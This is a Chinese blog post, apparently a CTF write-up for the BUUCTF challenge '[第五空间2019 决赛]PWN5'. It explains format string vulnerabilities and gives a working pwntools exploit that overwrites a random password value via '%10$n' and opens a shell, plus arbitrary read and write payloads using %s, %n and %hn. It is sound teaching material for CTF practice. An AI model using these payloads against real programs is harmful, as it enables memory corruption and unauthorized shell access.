[第五空间2019 决赛]PWN5

已于 2022-07-22 22:17:14 修改
阅读量1.5k 收藏 14
点赞数 6
分类专栏: 菜狗子pwn 文章标签: pwn python ctf linux
于 2022-07-21 21:14:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56301399/article/details/125919683
版权

文章目录

格式化字符串漏洞?

存在场景:存在格式化输出函数

如果输入正常的字符,程序就不会有问题。

格式字符串漏洞发生的条件就是格式字符串要求的参数和实际提供的参数不匹配。

为什么可以通过编译?
因为 printf() 函数的参数被定义为可变的。
为了发现不匹配的情况,编译器需要理解 printf() 是怎么工作的和格式字符串是什么。然而,编译器并不知道这些。
有时格式字符串并不是固定的,它可能在程序执行中动态生成。

printf() 函数自己可以发现不匹配吗?
printf() 函数从栈中取出参数,如果它需要 3 个,那它就取出 3 个。除非栈的边界被标记了,否则 printf() 是不会知道它取出的参数比提供给它的参数多了。然而并没有这样的标记。

一、查看文件信息

先file ./pwn查看文件类型再checksec --file=pwn检查一下文件保护情况。
在这里插入图片描述
在这里插入图片描述我们发现:32位程序,设置了canary,无法栈溢出。

二、IDA反编译

我们这里使用ida 32位打开文件。
我们查看mian函数,发现几个比较可疑的地方:
在这里插入图片描述
源程序大意是把随机数放入到0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。

看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。

首先我们先利用利用AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x的形式来计算偏移量:
在这里插入图片描述
因为A的Ascll码中为41,四个A就是41414141,我们可以在图片里看到第十个输出正是41414141所以偏移量为10。

之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。

而这个函数:
在这里插入图片描述
代表向这个地址中写入四个字节。
举个例子:
当payload为aaaa%7$n时,输出的字符数量为4,程序会将4写入0x61616161指向的内存中。
所以我们要用% 10 $ n来修改的话,我们写入的也是4,因为read(fd, &dword_804C044, 4u);中读入的是4个字节。

所以我们的代码为:

from pwn import *
## remote()建立远程连接,指明ip和port
io = remote('node4.buuoj.cn', 26427)
leak_addr = 0x804C044
io.recvuntil('your name:')
payload1 = p32(leak_addr) + b'%10$n'
io.sendline(payload1)#发送数据
io.recvuntil('your passwd:') #与shell进行交互
io.sendline(b'4')
io.interactive()

因为密码要和该地址存储的值一样,所以我们把密码改为b’4’.

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

总结

这里用到的一些知识:
1.任意地址读:

根据0x01中的知识,我们只需要把最后一个%08x换成%s就可以读取0x61616161地址的数据,注意这个0x61616161是我们可以控制的内容,就是我们输入的前四个字节且这四个字节就是读取的地址。所以,可以通过替换这个payload的前四个字节完成任意地址读。

这个payload也可以简化为aaaa%7 s ,这里的 7 s,这里的7 s,这里的7的意思就是取printf的第七个参数(0x61616161),如果这里要用等宽输出的话payload就变成这样了aaaa%7$08x,结果会输出aaaa61616161。

2.任意地址写:

我们先了解一下%n的作用。%n是将输出的字符的个数写入到内存中。

根据上述知识,当payload为aaaa%7$n时,输出的字符数量为4,程序会将4写入0x61616161指向的内存中。如果我们需要写更大的数就得用等宽输出来实现了。假设,我们需要向0x61616161写入100,则payload就变成了aaaa%7$0100n。

任意地址写还有一个问题就是,如果我们要写一个很大的数,比如要将0x8048320写入0x61616161,这个16进制对应的十进制数为134513440,也就是说需要在输出134513440个字符。不用多想,程序肯定会崩溃。

如果遇到这种情况怎么办呢?我们可以通过%hn来两字节两字节写入。在上面的例子中,我们将0x8048320拆分为高两字节0x804和低两字节0x8320,将0x804也就是十进制2052写入0x61616161 – 0x61616162;将0x8320也就是十进制33568写入0x61616163 – 0x61616164。分两次写入就可以完成大数的写入了。

参考链接

第一次碰见这种题,我看了好多大佬的解说,甚至有很多方法,我这里只采用了修改值的办法。没办法啊,菜狗子们还得多做做,我这里很抱歉并没有讲的很清楚,所以再附一下我的参考链接:

1.知识讲解
2.pwn考点总结
3.格式化字符串漏洞
4.题目的讲解
5.多种方法

长街395
关注
  • 6
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 405
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
writeUP-[第五空间2019 决赛]PWN5(待进一步完善待研究内容)
weixin_52111404的博客
08-02 2209
通过PWN5一题尝试理解格式化字符串漏洞。
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 608
简单易懂~
Buuctf[第五空间决赛2024]pwn5(2),这份字节跳动历年校招网络安全面试真题解析
最新发布
2401_84160272的博客
04-09 266
1.检查文件发现为32位2.ida32反编译从 /dev/urandom 中读取了四个字节的随机数,将其存储数据到unk_804c044所指向的内存,然后要求用户输入name和passwd。用户输入name后,它会直接将输入内容输出到屏幕上,然后要求用户输入passwd。程序将尝试将用户输入的passwd转换为整数,如果与之前生成的随机数相等,则输出"ok!!“并调用 /bin/sh执行 shell;否则输出"fail”发现存在格式化字符串漏洞。
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1381
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4311
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 2503
[第五空间2019 决赛]PWN5 ——两种解法
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 787
BUUCTF--pwn--[第五空间2019 决赛]PWN5
[BUUCTF]-PWN:[第五空间2019 决赛]PWN5解析
2301_79326813的博客
12-14 324
这里之所以能这样利用是利用了动态链接的延迟绑定,当函数第一次调用时会把该函数真正的地址写入got表内,之后的调用都会从got表内存的地址去调用,大致是plt->got->addr,atoi的plt表里存的是atoi的got地址,atoi的got里存的是atoi在程序中的真正地址,我们修改atoi的got的内容,那他在调用atoi的plt时就会直接调用system的plt,system的plt就会调用system的got,从而实现调用system函数。这里有大致有两种思路,都运用了格式化字符串漏洞。
PWN——[第五空间2019 决赛]PWN5
有头发的埼玉
11-14 468
完全通过静态分析得到题解,与网传算法不同
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值